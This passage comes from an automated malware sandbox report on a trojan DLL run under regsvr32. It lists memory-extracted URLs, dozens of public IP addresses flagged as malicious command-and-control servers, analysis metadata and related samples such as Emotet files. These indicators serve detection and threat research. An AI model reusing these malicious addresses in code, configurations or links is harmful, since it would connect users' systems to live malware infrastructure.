https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHh	0%	Avira URL Cloud	safe
https://www.pango.co/privacy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report	0%	URL Reputation	safe
https://51.91.76.89:8080/XmBjfLdyjiONnyu7	100%	Avira URL Cloud	malware
https://92.240.254.110/	0%	Avira URL Cloud	safe
https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHq	0%	Avira URL Cloud	safe
https://51.91.76.89:8080/XmBjfLdyjiONnyu	100%	Avira URL Cloud	malware
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://70.36.102.35/P	100%	Avira URL Cloud	malware
https://51.91.76.89/	100%	Avira URL Cloud	malware
https://disneyplus.com/legal.	0%	URL Reputation	safe
https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaH	0%	Avira URL Cloud	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
time.windows.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://92.240.254.110/z	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://51.91.76.89:8080/XmBjfLdyjiONnyuk	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000C.00000003.312946662.000001252E047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313237627.000001252E04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://70.36.102.35/	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288453875.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288429442.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000C.00000003.312964722.000001252E041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313229917.000001252E042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000C.00000003.312882702.000001252E05E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHh	regsvr32.exe, 00000005.00000002.771032007.0000000003267000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339220030.0000000003267000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hotspotshield.com/terms/	svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.pango.co/privacy	svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report	svchost.exe, 0000001B.00000003.467022331.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 0000000C.00000002.313195094.000001252E013000.00000004.00000020.00020000.00000000.sdmp	false		high
https://51.91.76.89:8080/XmBjfLdyjiONnyu7	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://92.240.254.110/	regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHq	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://51.91.76.89:8080/XmBjfLdyjiONnyu	regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000003.312958792.000001252E045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 0000000C.00000002.313257911.000001252E06A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312838362.000001252E068000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000C.00000003.312958792.000001252E045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000011.00000002.665573264.000002AB09200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.488587316.00000186AF0EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000001B.00000003.467022331.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467086716.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.466792013.00000186AF9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467007034.00000186AF9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467046280.00000186AF99D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000002.313195094.000001252E013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000C.00000003.312946662.000001252E047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313237627.000001252E04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000C.00000003.291213383.000001252E032000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.hotspotshield.com/	svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://70.36.102.35/P	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288453875.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
https://51.91.76.89/	regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://disneyplus.com/legal.	svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000C.00000003.291213383.000001252E032000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313221295.000001252E03B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaH	regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333956302.000000000326D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000003.312882702.000001252E05E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.182.25.250	unknown	France	16276	OVHFR	true
151.106.112.196	unknown	Germany	61157	PLUSSERVER-ASN1DE	true
79.172.212.216	unknown	Hungary	61998	SZERVERPLEXHU	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
51.254.140.238	unknown	France	16276	OVHFR	true
195.201.151.129	unknown	Germany	24940	HETZNER-ASDE	true
206.188.212.92	unknown	United States	55002	DEFENSE-NETUS	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
209.126.98.206	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
1.234.21.73	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
176.56.128.118	unknown	Switzerland	12637	SEEWEBWebhostingcolocationandcloudservicesIT	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
167.99.115.35	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
185.8.212.130	unknown	Uzbekistan	48979	UZINFOCOMUZ	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
51.91.76.89	unknown	France	16276	OVHFR	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
31.24.158.56	unknown	Spain	50926	INFORTELECOM-ASES	true
50.30.40.196	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
189.126.111.200	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
146.59.226.45	unknown	Norway	16276	OVHFR	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
196.218.30.83	unknown	Egypt	8452	TE-ASTE-ASEG	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
101.50.0.91	unknown	Indonesia	55688	BEON-AS-IDPTBeonIntermediaID	true
195.154.133.20	unknown	France	12876	OnlineSASFR	true
185.157.82.211	unknown	Poland	42927	S-NET-ASPL	true
70.36.102.35	unknown	United States	22439	PERFECT-INTERNATIONALUS	true
103.43.46.182	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
51.91.7.5	unknown	France	16276	OVHFR	true
5.9.116.246	unknown	Germany	24940	HETZNER-ASDE	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
209.250.246.206	unknown	European Union	20473	AS-CHOOPAUS	true
82.165.152.127	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
131.100.24.231	unknown	Brazil	61635	GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
192.99.251.50	unknown	Canada	16276	OVHFR	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
119.193.124.41	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
159.8.59.82	unknown	United States	36351	SOFTLAYERUS	true
92.240.254.110	unknown	Slovakia (SLOVAK Republic)	42005	LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSK	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	631731
Start date and time: 22/05/202204:17:10	2022-05-22 04:17:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FC6cLk6kKz (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@27/8@2/60
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 68.5% (good quality ratio 65.5%) Quality average: 75.7% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 99% Number of executed functions: 51 Number of non-executed functions: 330
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.210, 173.222.108.226, 20.223.24.244, 20.101.57.9
Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, twc.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:18:56	API Interceptor	11x Sleep call for process: svchost.exe modified
04:19:44	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
217.182.25.250	0xnQJ1y1YE.dll	Get hash	malicious	Browse
	ntn3NlNh90.dll	Get hash	malicious	Browse
	8u6naZBcZi.dll	Get hash	malicious	Browse
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse
	6eeJ2fpp8m.dll	Get hash	malicious	Browse
	form.xlsm	Get hash	malicious	Browse
	f5f5.dll	Get hash	malicious	Browse
	4c96.dll	Get hash	malicious	Browse
	RoundSliderCtrlDemo.dll	Get hash	malicious	Browse
	RoundSliderCtrlDemo.dll	Get hash	malicious	Browse
	gf.dll	Get hash	malicious	Browse
	Emotet.dll	Get hash	malicious	Browse
	meet.xlsm	Get hash	malicious	Browse
	omicsonline.net.xls	Get hash	malicious	Browse
	OMICS Publishing Group.xls	Get hash	malicious	Browse
	HLI64723144993179077493.xls	Get hash	malicious	Browse
	SCAN4469_00016.xls	Get hash	malicious	Browse
	check.xls	Get hash	malicious	Browse
	mplFI2HnY5.xls	Get hash	malicious	Browse
	EzzNJ9gwXK.xls	Get hash	malicious	Browse
151.106.112.196	0xnQJ1y1YE.dll	Get hash	malicious	Browse
	ntn3NlNh90.dll	Get hash	malicious	Browse
	8u6naZBcZi.dll	Get hash	malicious	Browse
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse
	6eeJ2fpp8m.dll	Get hash	malicious	Browse
	form.xlsm	Get hash	malicious	Browse
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse
	3ZhWeY0JJo.zip	Get hash	malicious	Browse
	form.xls	Get hash	malicious	Browse
	3866892832495839346959952.xls	Get hash	malicious	Browse
	form.xls	Get hash	malicious	Browse
	VEuIqlISMa.vbs	Get hash	malicious	Browse
	6874878548319557371921810184.lnk	Get hash	malicious	Browse
	5751879411642263817.doc.lnk	Get hash	malicious	Browse
	75744364019255557019031792.xls	Get hash	malicious	Browse
	91382109147537561.xls	Get hash	malicious	Browse
	form.xls	Get hash	malicious	Browse
	4e1baffe4077e80646285ba6d797ae304ea2fe089528c618985d39637dc8fe43_unpacked.dll	Get hash	malicious	Browse
	4e1baffe4077e80646285ba6d797ae304ea2fe089528c618985d39637dc8fe43_unpacked.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	69hw6kwGu3.dll	Get hash	malicious	Browse	54.37.106.167
	0xnQJ1y1YE.dll	Get hash	malicious	Browse	192.99.251.50
	nnQLG95Iw5.dll	Get hash	malicious	Browse	54.37.228.122
	Ypx3Ybt9Eh.dll	Get hash	malicious	Browse	176.31.73.90
	znINSa9qND.dll	Get hash	malicious	Browse	54.37.228.122
	ntn3NlNh90.dll	Get hash	malicious	Browse	192.99.251.50
	jb3jwePvPr.dll	Get hash	malicious	Browse	54.37.228.122
	Ypx3Ybt9Eh.dll	Get hash	malicious	Browse	176.31.73.90
	6y3a7LONTm.dll	Get hash	malicious	Browse	176.31.73.90
	jctwPdlACc.dll	Get hash	malicious	Browse	54.37.228.122
	8u6naZBcZi.dll	Get hash	malicious	Browse	192.99.251.50
	UFmRNifdR0.dll	Get hash	malicious	Browse	54.37.228.122
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse	192.99.251.50
	FeHCgEMAf1.dll	Get hash	malicious	Browse	51.91.76.89
	6eeJ2fpp8m.dll	Get hash	malicious	Browse	192.99.251.50
	rXxjkzHIQm.dll	Get hash	malicious	Browse	54.37.228.122
	g3gydIOxEf.dll	Get hash	malicious	Browse	149.56.131.28
	Azw8ucukGo.dll	Get hash	malicious	Browse	54.37.228.122
	jihJNCDwu3.dll	Get hash	malicious	Browse	54.37.228.122
	cl6DgxjC6O.dll	Get hash	malicious	Browse	149.56.131.28
PLUSSERVER-ASN1DE	ViiTOVGM74.dll	Get hash	malicious	Browse	151.106.112.196
	0xnQJ1y1YE.dll	Get hash	malicious	Browse	151.106.112.196
	ntn3NlNh90.dll	Get hash	malicious	Browse	151.106.112.196
	8u6naZBcZi.dll	Get hash	malicious	Browse	151.106.112.196
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse	151.106.112.196
	6eeJ2fpp8m.dll	Get hash	malicious	Browse	151.106.112.196
	T4IoJqcAwY.exe	Get hash	malicious	Browse	31.210.20.149
	Balance_Payment.exe	Get hash	malicious	Browse	31.210.20.242
	Bekliyor Odeme.exe	Get hash	malicious	Browse	31.210.20.242
	mQJnLaOZI1	Get hash	malicious	Browse	62.75.180.116
	OdemeEuros.exe	Get hash	malicious	Browse	31.210.20.242
	PagoUSD.exe	Get hash	malicious	Browse	31.210.20.242
	3wJDLc1Pfi	Get hash	malicious	Browse	89.19.249.203
	SLTiDC-Attachment.exe	Get hash	malicious	Browse	31.210.20.56
	form.xlsm	Get hash	malicious	Browse	151.106.112.196
